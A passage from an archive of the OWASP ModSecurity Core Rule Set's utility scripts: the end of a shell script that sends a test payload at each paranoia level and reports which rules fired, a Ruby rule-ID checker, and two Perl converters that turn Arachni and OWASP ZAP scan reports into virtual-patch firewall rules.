$CRS/*.conf |egrep -v "(016|017),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,') # Paranoia level 4 rules, rule 018 is the delimiter of the start of PL4 # Paranoia level 4 rules, "Paranoia Levels Finished" delimiter of the end of PL4 PL4=$(awk "/018,phase:2/,/Paranoia Levels Finished/" $CRS/*.conf |egrep -v "018,phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,') echo "Sending the following payload at multiple paranoia levels: $PAYLOAD" echo for PL in 1 2 3 4; do echo "--- Paranoia Level $PL ---" echo if [ -f "$PAYLOAD" ]; then curl $protocol://$URL $resolve -k --data-binary "@$PAYLOAD" -H "PL: $PL" -o /dev/null -s else curl $protocol://$URL $resolve -k -d "$PAYLOAD" -H "PL: $PL" -o /dev/null -s fi # Here are three ways to get the transaction unique id, # the first one is Christian's format, second is Spartan's format, # and the third one tries to guess which is the unique id using a # regular expression, the first two require specific format. # The automatic format detection may cause the script to malfunction. # Uncomment only the required format. # To use Christian's accesslog format uncomment the following line uniq_id=$(tail -1 $accesslog | cut -d\" -f11 | cut -b2-26) # To use Spartan's accesslog format (21 col) uncomment the following line #uniq_id=$(tail -1 $accesslog | awk '{print $21}') # To use the automatic unique_id detection uncomment the following line #uniq_id=$(tail -1 $accesslog | egrep -o '[a-zA-Z0-9]{26,28}') echo "Tracking unique id: $uniq_id" grep $uniq_id $errorlog | sed -e "s/.*\[id \"//" -e "s/\(......\).*\[msg \"/\1 /" -e "s/\"\].*//" -e "s/(Total .*/(Total ...) .../" -e "s/Incoming and Outgoing Score: [0-9]* [0-9]*/Incoming and Outgoing Score: .../" | sed -e "s/$PL1/& PL1/" -e "s/$PL2/& PL2/" -e "s/$PL3/& PL3/ " -e "s/$PL4/& PL4/" | sort -k2 | sed -r "s/^([0-9]+)$/\1 FOREIGN RULE NOT IN CRS/" echo echo -n "Total Incoming Score: " # Here are two ways to get the transaction anomaly score, # the first one is Christian's format, second is Spartan's format # To use Christian's accesslog format uncomment the following line tail -1 $accesslog | cut -d\" -f11 | cut -d\ -f14 | tr "-" "0" # To use Spartan's accesslog format (21 col) uncomment the following line # To use a different column change the $NF value, e.g. $(NF-1) #tail -1 $accesslog | awk '{print $NF}' | tr "-" "0" echo done �������������������������������������������������������������������modsecurity-crs-3.3.5/util/verify.rb����������������������������������������������������������������0000775�0000000�0000000�00000006465�14461225151�0017503�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env ruby # -*- coding: utf-8 -*- # # Copyright © 2012 Diego Elio Pettenò # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS # ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES # OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE # CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL # DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR # PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS # ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS # SOFTWARE. require 'set' seen_ids = Set.new res = 0 # read reserved id range from the id-range file so that it can be # configured on a per-repository basis. range = Range.new(*File.read('id-range').rstrip.split('-').map(&:to_i)) # open all the rule files Dir.chdir("../") Dir["**/*.conf"].each do |rulefile| # read the content content = File.read(rulefile) lineno = 0 this_chained = next_chained = false prevline = nil # for each line in the rule file content.each_line do |line| lineno += 1 # handle continuation lines line = (prevline + line) unless prevline.nil? # remove comments line.gsub!(/^([^'"]|'[^']+'|"[^"]+")#.*/) { $1 } if line =~ /\\\n$/ prevline = line.gsub(/\\\n/, '') next else prevline = nil end # skip if it's an empty line (this also skip comment-only lines) next if line =~ /(?:^\s+$|^#)/ this_chained = next_chained next_chained = false # split the directive in its components, considering quoted strings directive = line.scan(/([^'"\s][^\s]*[^'"\s]|'(?:[^']|\\')*[^\\]'|"(?:[^"]|\\")*[^\\]")(?:\s+|$)/).flatten directive.map! do |piece| # then make sure to split the quoting out of the quoted strings (piece[0] == '"' || piece[0] == "'") ? piece[1..-2] : piece end # skip if it's not a SecRule or SecAction case directive[0] when "SecRule" rawrule = directive[3] when "SecAction" rawrule = directive[1] else next end # get the rule and split in its components rule = (rawrule || "").gsub(/(?:^"|"$)/, '').split(/\s*,\s*/) if rule.include?("chain") next_chained = true end ids = rule.find_all { |piece| piece =~ /^id:/ } if ids.size > 1 $stderr.puts "#{rulefile}:#{lineno} rule with multiple ids" next elsif ids.size == 0 id = nil else id = ids[0].sub(/^id:/, '').gsub(/(?:^'|'$)/, '').to_i end if this_chained unless id.nil? $stderr.puts "#{rulefile}:#{lineno} chained rule with id" res = 1 end next elsif id.nil? $stderr.puts "#{rulefile}:#{lineno} rule missing id (#{rule.join(',')})" res = 1 next elsif ! range.include?(id) $stderr.puts "#{rulefile}:#{lineno} rule with id #{id} outside of reserved range #{range}" res = 1 elsif seen_ids.include?(id) $stderr.puts "#{rulefile}:#{lineno} rule with duplicated id #{id}" res = 1 end seen_ids << id end end exit res �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/virtual-patching/��������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0021115�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/virtual-patching/arachni2modsec.pl���������������������������������������0000775�0000000�0000000�00000030312�14461225151�0024336�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/opt/local/bin/perl -T ############################################# # -=[ Virtual Patching Converter Script ]=- # # Converts arachni XML Output # # https://github.com/Zapotek/arachni # # # # arachni2modsec.pl # # Version: 1.0 # # # # Copyright 2011 # # Trustwave's SpiderLabs Research Team # # www.trustwave.com # # # # Based On Code Originally Created by: # # The Denim Group # # www.denimgroup.com # ############################################# use XML::Smart; use Switch; use Data::Types qw(:all); use Data::Validate::URI qw(is_uri); use Getopt::Std; use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later ############# # Variables # ############# # [Configuration Vars] my %param; getopt("f",\%param); $filename = $param{f}; my $all_vulnerabilities_filename = "$filename"; unless ($filename) { print "Flag:\n\n\t -f:\t path to arachni xml report file\nUsage:\n\n\t./arachni2modsec.pl -f ./arachni_report.xml\n\n"; exit; } my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf"; # [End Config Vars] my $VULN_CLASS_XSS = "Cross-Site Scripting (XSS)"; my $VULN_CLASS_SQLI = "SQL Injection"; my $VULN_CLASS_BLIND_SQLI = "Blind SQL Injection"; my $VULN_CLASS_LFI = "Path Traversal"; my $VULN_CLASS_RFI = "Remote file inclusion"; my $VULN_CLASS_HTTPRS = "Response splitting"; # Only the vulnerabilities in this array will have # rules generated for them. my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_BLIND_SQLI, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS); my $num_rules_generated=0; my $num_not_supported=0; my $num_bad_urls=0; my $wait_for_keypress=1; my $request_failed=0; my $all_vulns_xml; my @type; my @id; my $vuln_count; my $num_attacks_flag=0; my $num_attacks_noflag=0; # End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ############# # Main # ############# # Clean up env so perl doesn't complain # when trying to run the restart snort # script. delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)}; $all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename); @type = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','name'); @url = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','url'); @param = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','variable'); open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file"; $MODSEC_RULES->autoflush(1); $vuln_count = 0; foreach my $current_type (@type){ print "==================================================================================================\n"; print "Vulnerability[$vuln_count] - Type: $current_type\n"; if(exists {map { $_ => 1 } @supported_vulns}->{$current_type}){ parseData(to_string($current_type)); }else { print "Vulnerability Type: $type is not supported in this version.\n"; $num_not_supported++; } $vuln_count++; } close($MODSEC_RULES); print "==================================================================================================\n"; print "\n\n************ END OF SCRIPT RESULTS *****************\n"; print "Number of Vulnerabilities Processed: $vuln_count\n"; print "Number of ModSecurity rules generated: $num_rules_generated\n"; print "Number of Unsupported vulns skipped: $num_not_supported\n"; print "Number of bad URLs (rules not gen): $num_bad_urls\n"; print "****************************************************\n\n"; print "----------------------------------------------------\n"; print "To activate the virtual patching file ($modsec_rules_file),\n"; print "copy it into the CRS \"base_rules\" directory and then create\n"; print "a symlink to it in the \"activated_rules\" directory.\n"; print "-----------------------------------------------------\n\n"; ############### # Subroutines # ############### sub parseData { my($vuln_str) = @_; my $vuln_detail_filename; my $current_vuln_xml; my $current_vuln_url; my $current_vuln_param; my $current_uricontent; my @current_params; my $id = $vuln_count; print "Found a $vuln_str vulnerability.\n"; $current_vuln_xml = XML::Smart->new($all_vulnerabilities_filename); $current_vuln_url = $url[$vuln_count]; print URL_LIST "$current_vuln_url\n"; # Validate url (need separate sub?) print "Validating URL: $current_vuln_url\n"; if(is_uri(to_string($current_vuln_url))){ print "URL is well-formed\n"; print "Continuing Rule Generation\n"; } else { print "URL is NOT well-formed. Breaking Out of Rule Generation\n"; $num_bad_urls++; # Waits for keypress in test mode so you can # see why the URL failed validation. if($test_mode){ wait_for_keypress(); } return; } $current_uricontent = get_uricontent($current_vuln_url); # Only need param if XSS attack,SQLINJ,XPATH # and maybe for HTTPRS, DT. # NOT for PRL and DI if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ @current_params = $param[$vuln_count]; } if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ print "Current vulnerable Param(s): @current_params\n"; } generate_patch($vuln_str,$current_uricontent,@current_params); } sub generate_patch { my($type,$uricontent,@params,$current_vuln_xml) = @_; my $rule = ""; $id = "1".$vuln_count; switch($type) { case ($VULN_CLASS_XSS) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ # Check to see if each vulnerable parameter is valid # then generate a rule using both uricontent and the # parameter $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/XSS.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_XSS (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_SQLI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_BLIND_SQLI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_LFI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/LFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_RFI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_HTTPRS) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RESPONSE_SPLITTING.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_RFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } } } sub get_uricontent { my($url) = @_; my $regex = "http:\/\/+[a-zA-Z0-9.:-]*\/"; # First, trim the first part out of the URL: # http://.../ $url =~ /$regex/; substr($url,index($url,$&),length($&)) = ""; # If the URL contains a php or cgi query with # one or more params and values, trim those out. # Trim from the question mark to the end. if($url =~ /\?/){ substr($url,index($url,"?")) = ""; } return $url; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/virtual-patching/zap2modsec.pl�������������������������������������������0000775�0000000�0000000�00000030372�14461225151�0023531�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/opt/local/bin/perl -T ############################################# # -=[ Virtual Patching Converter Script ]=- # # Converts OWASP ZAP XML Output # # https://code.google.com/p/zaproxy/ # # # # zap2modsec.pl # # Version: 1.0 # # # # Copyright 2011 # # Trustwave's SpiderLabs Research Team # # www.trustwave.com # # # # Based On Code Originally Created by: # # The Denim Group # # www.denimgroup.com # ############################################# use XML::Smart; use Switch; use Data::Types qw(:all); use Data::Validate::URI qw(is_uri); use Getopt::Std; use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later ############# # Variables # ############# # [Configuration Vars] my %param; getopt("f",\%param); $filename = $param{f}; my $all_vulnerabilities_filename = "$filename"; unless ($filename) { print "Flag:\n\n\t -f:\t path to ZAP xml report file\nUsage:\n\n\t./zap2modsec.pl -f ./zap_report.xml\n\n"; exit; } my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf"; # [End Config Vars] my $VULN_CLASS_XSS = "Cross Site Scripting"; my $VULN_CLASS_SQLI = "SQL Injection"; my $VULN_CLASS_SQLI_FINGERPRINT = "SQL Injection Fingerprinting"; my $VULN_CLASS_LFI = "Path Traversal"; my $VULN_CLASS_RFI = "Remote File Inclusion"; my $VULN_CLASS_HTTPRS = "HTTP Response Splitting"; # Only the vulnerabilities in this array will have # rules generated for them. my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_SQLI_FINGERPRINT, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS); my $num_rules_generated=0; my $num_not_supported=0; my $num_bad_urls=0; my $wait_for_keypress=1; my $request_failed=0; my $all_vulns_xml; my @type; my @id; my $vuln_count; my $num_attacks_flag=0; my $num_attacks_noflag=0; # End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ############# # Main # ############# # Clean up env so perl doesn't complain # when trying to run the restart snort # script. delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)}; $all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename); @type = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','alert'); @url = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','uri'); @param = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','param'); open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file"; $MODSEC_RULES->autoflush(1); $vuln_count = 0; foreach my $current_type (@type){ print "==================================================================================================\n"; print "Vulnerability[$vuln_count] - Type: $current_type\n"; if(exists {map { $_ => 1 } @supported_vulns}->{$current_type}){ parseData(to_string($current_type)); }else { print "Vulnerability Type: $type is not supported in this version.\n"; $num_not_supported++; } $vuln_count++; } close($MODSEC_RULES); print "==================================================================================================\n"; print "\n\n************ END OF SCRIPT RESULTS *****************\n"; print "Number of Vulnerabilities Processed: $vuln_count\n"; print "Number of ModSecurity rules generated: $num_rules_generated\n"; print "Number of Unsupported vulns skipped: $num_not_supported\n"; print "Number of bad URLs (rules not gen): $num_bad_urls\n"; print "****************************************************\n\n"; print "----------------------------------------------------\n"; print "To activate the virtual patching file ($modsec_rules_file),\n"; print "copy it into the CRS \"base_rules\" directory and then create\n"; print "a symlink to it in the \"activated_rules\" directory.\n"; print "-----------------------------------------------------\n\n"; ############### # Subroutines # ############### sub parseData { my($vuln_str) = @_; my $vuln_detail_filename; my $current_vuln_xml; my $current_vuln_url; my $current_vuln_param; my $current_uricontent; my @current_params; my $id = $vuln_count; print "Found a $vuln_str vulnerability.\n"; $current_vuln_xml = XML::Smart->new($all_vulnerabilities_filename); $current_vuln_url = $url[$vuln_count]; print URL_LIST "$current_vuln_url\n"; # Validate url (need separate sub?) print "Validating URL: $current_vuln_url\n"; if(is_uri(to_string($current_vuln_url))){ print "URL is well-formed\n"; print "Continuing Rule Generation\n"; } else { print "URL is NOT well-formed. Breaking Out of Rule Generation\n"; $num_bad_urls++; # Waits for keypress in test mode so you can # see why the URL failed validation. if($test_mode){ wait_for_keypress(); } return; } $current_uricontent = get_uricontent($current_vuln_url); # Only need param if XSS attack,SQLINJ,XPATH # and maybe for HTTPRS, DT. # NOT for PRL and DI if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ @current_params = $param[$vuln_count]; } if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ print "Current vulnerable Param(s): @current_params\n"; } generate_patch($vuln_str,$current_uricontent,@current_params); } sub generate_patch { my($type,$uricontent,@params,$current_vuln_xml) = @_; my $rule = ""; $id = "1".$vuln_count; switch($type) { case ($VULN_CLASS_XSS) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ # Check to see if each vulnerable parameter is valid # then generate a rule using both uricontent and the # parameter $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/XSS.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_XSS (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_SQLI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_BLIND_SQLI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_LFI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/LFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_RFI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_HTTPRS) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RESPONSE_SPLITTING.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_RFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } } } sub get_uricontent { my($url) = @_; my $regex = "http:\/\/+[a-zA-Z0-9.:-]*\/"; # First, trim the first part out of the URL: # http://.../ $url =~ /$regex/; substr($url,index($url,$&),length($&)) = ""; # If the URL contains a php or cgi query with # one or more params and values, trim those out. # Trim from the question mark to the end. if($url =~ /\?/){ substr($url,index($url,"?")) = ""; } return $url; } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������